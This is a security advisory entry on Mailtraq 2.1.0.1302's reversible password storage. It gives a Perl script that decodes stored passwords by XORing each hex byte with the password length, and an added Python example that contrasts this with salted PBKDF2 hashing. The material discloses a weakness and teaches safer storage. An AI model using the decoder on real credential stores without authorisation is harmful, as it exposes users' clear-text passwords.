
Mailtraq 2.1.0.1302 - User Password Encoding

Author: Noam Rathaus
type: local
platform: windows
date_added: 2003-06-16 
date_updated: 2012-11-17 
verified: 1 
codes: OSVDB-4092 

source: https://www.securityfocus.com/bid/7923/info

It has been reported that Mailtraq does not store user passwords securely. As a result, an attacker may have an increased chance of gaining access to clear-text passwords.

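#!/usr/bin/perl
use strict;
use warnings;

# Stored password value to decode, passed as the first command-line argument.
my $Password = $ARGV[0];
die "Usage: $0 <encoded password>\n" unless defined $Password;

print "Passwords should be something like: \\3D66656463626160\n";
print "Provided password: $Password\n";

# Skip the three-character prefix; the rest is two hex digits per character.
$Password = substr($Password, 3);
my $Length = length($Password)/2;

print "Length: $Length\n";

# Each stored byte is the clear-text character XORed with the password length.
for (my $i = 0; $i < $Length; $i++)
{
    print "Decoding: ", substr($Password, $i*2, 2), " = ";
    my $ord = hex(substr($Password, $i*2, 2));

    print $ord^$Length, " (", chr($ord^$Length), ")\n";
}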
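
An added example in Python (not part of the original advisory and not Mailtraq's code): the reversible encoding that the script above undoes, next to a salted PBKDF2 record that leaves nothing to decode. The encoder is inferred from the script; the function names, the record layout and the iteration count are assumptions.

```python
import hashlib
import hmac
import os

PREFIX = "\\3D"  # three-character prefix from the page's sample value; treated as opaque


def mailtraq_decode(stored: str) -> str:
    """Reverse the stored form the same way the Perl script does."""
    body = stored[3:]                      # the script skips the first three characters
    if len(body) % 2:
        raise ValueError("hex body must have an even number of digits")
    raw = bytes.fromhex(body)
    key = len(raw)                         # the only "key" is the password length
    return "".join(chr(b ^ key) for b in raw)


def mailtraq_encode(password: str) -> str:
    """Inverse of mailtraq_decode for short ASCII passwords (inferred, an assumption)."""
    key = len(password)
    return PREFIX + "".join(f"{ord(c) ^ key:02X}" for c in password)


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Hardened storage: random salt plus PBKDF2-HMAC-SHA256, a one-way record."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the hash from the candidate and compare in constant time."""
    _, iterations, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    sample = "\\3D66656463626160"          # sample value printed by the script above
    print("reversible:", mailtraq_decode(sample))
    record = hash_password("abcdefg")
    print("one-way   :", record, verify_password("abcdefg", record))
```

The encoded form also reveals the password length and is identical for every account that shares a password, while the salted record differs on every call.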